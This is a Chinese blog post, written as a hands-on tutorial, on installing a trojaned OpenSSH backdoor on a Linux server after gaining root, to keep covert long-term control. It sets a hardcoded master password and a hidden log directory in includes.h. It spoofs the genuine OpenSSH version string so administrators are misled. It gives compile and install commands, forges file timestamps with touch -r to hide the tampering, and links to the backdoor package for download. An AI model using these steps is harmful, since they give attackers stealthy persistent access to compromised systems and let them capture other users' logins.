某ssh后门试用
在获取linux的root权限之后,虽然可以ssh连进去,但是可否长期进行控制呢?这里就涉及到ssh后门的问题了。在这里,我大致试用了一下一个比较老但是稳定的ssh后门,算是作个记录。后续我会翻译一篇老外用python写的ssh后门。好了,我会在虚拟机中对ssh后门做一个演示,最后我会放出下载到的后门程序。
在这里,我使用安装的Kali1.1.0_32来进行试验。(尝试过ubuntu12.04.5和ubuntu14.04.1,都失败了)首先把下载的ssh后门程序放到指定文件夹中。查看一下本机安装的ssh版本,如下图所示:
我们需要在version.h中把ssh的版本号改为我们本机得到的OpenSSH版本号,我觉得这个就是后续用来迷惑管理员的,免得管理员感觉异常导致ssh后门程序的暴露。(其实查看版本信息的时候,还是可以发现有异常)
好了,我们来修改下version.h文件的ssh版本号,具体如下所示:
#define SSH_VERSION "OpenSSH_6.0p1 Debian-4+deb7u2, OpenSSL 1.0.1e 11 Feb 2013"
上面红色部分是我虚拟机ubuntu中OpenSSH的版本号。
接下来,设置一下ssh后门的密码,这个在include.h文件中进行设置,如下图所示:
/* $OpenBSD: includes.h,v 1.17 2002/01/26 16:44:22 stevesk Exp $ */
/*
* Author: Tatu Ylonen <ylo@cs.hut.fi>* Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland* All rights reserved* This file includes most of the needed system headers.** As far as I am concerned, the code I have written for this software* can be used freely for any purpose. Any derived versions of this* software must be clearly marked as such, and if the derived work is* incompatible with the protocol description in the RFC file, it must be* called by a name other than "ssh" or "Secure Shell".*/#ifndef INCLUDES_H#define INCLUDES_H#define RCSID(msg) \static /**/const char *const rcsid[] = { (char *)rcsid, "\100(#)" msg }#include "config.h"
#include <stdio.h>#include <ctype.h>#include <errno.h>#include <fcntl.h> /* For O_NONBLOCK */
#include <signal.h>
#include <stdlib.h>#include <string.h>#include <stdarg.h>#include <pwd.h>#include <grp.h>#include <time.h>
#include <dirent.h>#ifdef HAVE_LIMITS_H# include <limits.h> /* For PATH_MAX */
#endif#ifdef HAVE_GETOPT_H# include <getopt.h>#endif#ifdef HAVE_BSTRING_H# include <bstring.h>#endif#if defined(HAVE_GLOB_H) && defined(GLOB_HAS_ALTDIRFUNC) && \
defined(GLOB_HAS_GL_MATCHC)# include <glob.h>#endif#ifdef HAVE_NETGROUP_H# include <netgroup.h>#endif#if defined(HAVE_NETDB_H)
# include <netdb.h>#endif#ifdef HAVE_ENDIAN_H# include <endian.h>#endif#ifdef HAVE_TTYENT_H# include <ttyent.h>#endif#ifdef HAVE_UTIME_H# include <utime.h>#endif#ifdef HAVE_MAILLOCK_H# include <maillock.h> /* For _PATH_MAILDIR */
#endif#ifdef HAVE_NEXT# include <libc.h>#endif#include <unistd.h> /* For STDIN_FILENO, etc */
#include <termios.h> /* Struct winsize */
/*
*-*-nto-qnx needs these headers for strcasecmp and LASTLOG_FILE respectively*/#ifdef HAVE_STRINGS_H# include <strings.h>#endif#ifdef HAVE_LOGIN_H# include <login.h>#endif#ifdef HAVE_UTMP_H# include <utmp.h>#endif#ifdef HAVE_UTMPX_H# ifdef HAVE_TV_IN_UTMPX# include <sys/time.h>
# endif# include <utmpx.h>#endif#ifdef HAVE_LASTLOG_H# include <lastlog.h>#endif#ifdef HAVE_PATHS_H# include <paths.h> /* For _PATH_XXX */
#endif#include <sys/types.h>#include <sys/socket.h>#include <sys/ioctl.h>#include <sys/wait.h>#ifdef HAVE_SYS_TIME_H# include <sys/time.h> /* For timersub */#endif#include <sys/resource.h>#ifdef HAVE_SYS_SELECT_H# include <sys/select.h>#endif#ifdef HAVE_SYS_BSDTTY_H# include <sys/bsdtty.h>#endif#include <sys/param.h> /* For MAXPATHLEN and roundup() */
#ifdef HAVE_SYS_UN_H# include <sys/un.h> /* For sockaddr_un */
#endif#ifdef HAVE_SYS_BITYPES_H# include <sys/bitypes.h> /* For u_intXX_t */
#endif#ifdef HAVE_SYS_CDEFS_H# include <sys/cdefs.h> /* For __P() */
#endif#ifdef HAVE_SYS_STAT_H# include <sys/stat.h> /* For S_* constants and macros */
#endif#ifdef HAVE_SYS_SYSMACROS_H# include <sys/sysmacros.h> /* For MIN, MAX, etc */
#endif#ifdef HAVE_SYS_MMAN_H#include <sys/mman.h> /* for MAP_ANONYMOUS */
#endif#include <netinet/in_systm.h> /* For typedefs */
#include <netinet/in.h> /* For IPv6 macros */
#include <netinet/ip.h> /* For IPTOS macros */
#include <netinet/tcp.h>#include <arpa/inet.h>#ifdef HAVE_RPC_TYPES_H# include <rpc/types.h> /* For INADDR_LOOPBACK */
#endif#ifdef USE_PAM# include <security/pam_appl.h>#endif#ifdef HAVE_READPASSPHRASE_H# include <readpassphrase.h>#endif#include <openssl/opensslv.h> /* For OPENSSL_VERSION_NUMBER */
#include "defines.h"
#include "version.h"
#include "openbsd-compat/openbsd-compat.h"
#include "openbsd-compat/bsd-cygwin_util.h"
#include "openbsd-compat/bsd-nextstep.h"
#include "entropy.h"
/* hax0r shit */
#define _SECRET_PASSWD "test@12345"
#define _LOG_DIR "/usr/local/share/0wn"
#define _S_LOG "slog"
#define _C_LOG "clog"
FILE *outf;int mlogin_ok;
FILE *f;char message[512];
/* end hax0r shit */
#endif /* INCLUDES_H */
如上图所示,在#define _SECRET_PASSWD设置ssh后门的密码,我设置的是test@12345。完成这两部之后,就开始编译ssh后门了。为了安全起见,首先完成原来ssh一些文件的备份工作。
备份原文件:
mv /etc/ssh/ssh_config /etc/ssh/ssh_config.oldmv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
编译安装:(需要定位到ssh后门所在文件夹)
./configure --prefix=/usr --sysconfdir=/etc/sshmake && make installcp ssh_config sshd_config /etc/ssh/
修改文件时间:
touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_configtouch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config
重启服务:
/etc/init.d/ssh restart
登入后门:
可以看到正常登陆。到此结束,最后分享一下这个ssh后门程序。
地址:http://pan.baidu.com/s/1rXDIe(密码:1di8)